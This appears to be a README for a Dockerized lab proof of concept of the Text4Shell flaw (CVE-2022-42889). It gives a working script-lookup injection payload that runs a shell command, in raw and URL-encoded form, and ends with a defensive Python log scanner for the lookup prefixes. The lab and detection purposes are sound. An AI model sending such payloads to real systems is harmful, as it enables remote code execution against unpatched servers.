cve-2022-42889-text4shell-docker

Dockerized POC for CVE-2022-42889 Text4Shell


Install maven - maven-linux


1. Docker build

   ```
   docker build --tag=text4shell .
   ```

2. Docker run

   ```
   docker run -p 80:8080 text4shell
   ```

3. Test the app

   ```
   http://localhost/text4shell/attack?search=<anything>
   ```

4. The attack can be performed by passing a string of the form `${prefix:name}`, where the prefix is the aforementioned lookup:

   ```
   ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
   ```

   ```
   http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
   ```

5. You can also try using `dns` or `url` prefixes.

6. Get the container id

   ```
   docker container ls
   ```

7. Get into the app

   ```
   docker exec -it <container_id> bash
   ```

8. To check whether the above RCE was successful (you should see a file named `foo` created in the `/tmp` directory):

   ```
   ls /tmp/
   ```

9. To stop the container

   ```
   docker container stop <container_id>
   ```
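
A defender-side check for the requests this POC sends, as an added example that is not part of the original repository: it percent-decodes access-log lines and flags the `script`, `dns` and `url` lookup prefixes named above. The log format, the sample lines and the three-round decode limit are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Lookup prefixes named on this page: script, dns, url.
# Matched case-insensitively so mixed-case variants are not missed.
LOOKUP_RE = re.compile(r"\$\{(script|dns|url):", re.IGNORECASE)
MAX_DECODE_ROUNDS = 3  # assumption: enough for double/triple percent-encoding


def decode_fully(value):
    """Percent-decode repeatedly until the string stops changing."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lookups(log_line):
    """Return the lower-cased lookup prefixes found in one log line."""
    return [m.group(1).lower() for m in LOOKUP_RE.finditer(decode_fully(log_line))]


def scan(lines):
    """Yield (line_number, prefixes) for each line carrying a lookup."""
    for number, line in enumerate(lines, start=1):
        prefixes = find_lookups(line)
        if prefixes:
            yield number, prefixes


# Constructed sample access-log lines (not captured from a real system).
SAMPLE_LOG = [
    '172.17.0.1 - - "GET /text4shell/attack?search=hello HTTP/1.1" 200',
    '172.17.0.1 - - "GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3A'
    "java.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"
    ' HTTP/1.1" 200',
    # Double-encoded, upper-case prefix: still flagged after two decode rounds.
    '172.17.0.1 - - "GET /text4shell/attack?search=%2524%257BDNS%253Aexample.test%257D HTTP/1.1" 200',
    # Plain ${name} placeholder without a lookup prefix: not flagged.
    '172.17.0.1 - - "GET /text4shell/attack?search=%24%7Bprice%7D HTTP/1.1" 200',
]

if __name__ == "__main__":
    for number, prefixes in scan(SAMPLE_LOG):
        print(f"line {number}: lookup prefix(es) {prefixes}")
```

Log-based matching only covers payloads that reach the log, such as query strings; values sent in request bodies or headers need the same check at a proxy or WAF.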